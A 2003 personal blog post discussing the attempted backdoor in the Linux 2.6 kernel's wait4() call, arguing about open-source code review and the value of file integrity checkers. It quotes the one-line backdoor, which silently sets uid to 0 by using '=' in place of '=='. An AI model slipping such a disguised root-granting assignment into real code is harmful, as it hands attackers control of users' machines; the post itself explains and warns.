We judge ourselves by our ideals; others by their actions. It is a great convenience.
-- Howard Zinn
JaBbA's Hut

Today's Tao (Chapter 45):

Great perfection seems incomplete,
But does not decay;
Great abundance seems empty,
But does not fail.

Great truth seems contradictory;
Great cleverness seems stupid;
Great eloquence seems awkward.

As spring overcomes the cold,
And autumn overcomes the heat,
So calm and quiet overcome the world.
Friends and Family Login
Username

Password

Remember Me
NEW It Works!!!!

Friend or Family?
To see the stuff
hidden from the wider world,
Click Here

Contact Me

Email Me at http://xri.net/=Justin.B.Alcorn

Subscribe

Subscribe to JaBbA's Hut! Have new entries emailed to you!
Your email address:

Quicksearch

About Me

  • PGP Key Fingerprint A36D D691 C5B0 BE15 5A2A AF49 AA1C 372C. Get my Key for "Justin Bradford Alcorn" from http://pgpkeys.mit.edu .

Calendar

Back May '12
Sun Mon Tue Wed Thu Fri Sat
    1 2 3 4 5
6 7 8 9 10 11 12
13 14 15 16 17 18 19
20 21 22 23 24 25 26
27 28 29 30 31    

Archives

May 2012
April 2012
March 2012
Recent...
Older...

Syndicate This Blog

Blog Administration

Open login screen

Categories



All categories

Powered by

Serendipity PHP Weblog

Creative Commons License

Creative Commons License - Some Rights Reserved
Original content in this work is licensed under a Creative Commons License

JaBbA's Hut

White Hat Liberal Geek Dad

Friday, November 14. 2003

The Good - And Bad - of Open Source

Security
Someone attempted to put a backdoor into the 2.6 Linux Kernel through what looked to be a simple error checking patch in the wait4() call. The code:

if ((options == (__WCLONE|__WALL)) && (current->uid = 0))

looks benign enough - except that it doesn't CHECK for uid == 0, it SETS uid = 0. UID 0 is the root account. Instant control of the machine.

Open Source detractors will point to this and say "See, Open Source leaves you open to hackers". But the truth is that typing '=' instead of '==' is one of the most common bugs in programming. And with Open Source, the constant code review and the multiple sets of eyes means that stuff like this is more likely to get caught. You think if a M$ programmer put that into the Windows2003 kernel that someone else would have caught it?

Are you sure they didn't? Who's watching?

*********11/17********Update************ (See Extended Entry)

This is a perfect example of why integrity checkers are critical - and why watching your logs is so important. The file was changed in a CVS repository directly from the OS by hacking in - and the administrator of the machine noticed the change when the file integrity checker ran. He was annoyed that someone seemed to be skirting the CVS process, and posted a message to that effect.

People reading the message realized that there was a problem and began reviewing the code, and someone finally found the attempted hack.

If the admin has not been reading his logs, or if people had simply assumed that it was a non-event, the hack would have been successful.

Posted by JaBbA in Security at 07:52 | Comments (0) | Trackbacks (0)

Trackbacks
Trackback specific URI for this entry

No Trackbacks

Comments
Display comments as (Linear | Threaded)

No comments

Add Comment

Enclosing asterisks marks text as bold (*word*), underscore are made via _word_.
Standard emoticons like :-) and ;-) are converted to images.
BBCode format allowed
E-Mail addresses will not be displayed and will only be used for E-Mail notifications

To prevent automated Bots from commentspamming, please enter the string you see in the image below in the appropriate input box. Your comment will only be submitted if the strings match. Please ensure that your browser supports and accepts cookies, or your comment cannot be verified correctly.
CAPTCHA
 
Submitted comments will be subject to moderation before being displayed.
 
Please send a whole bunch of email to johnny@jalcorn.net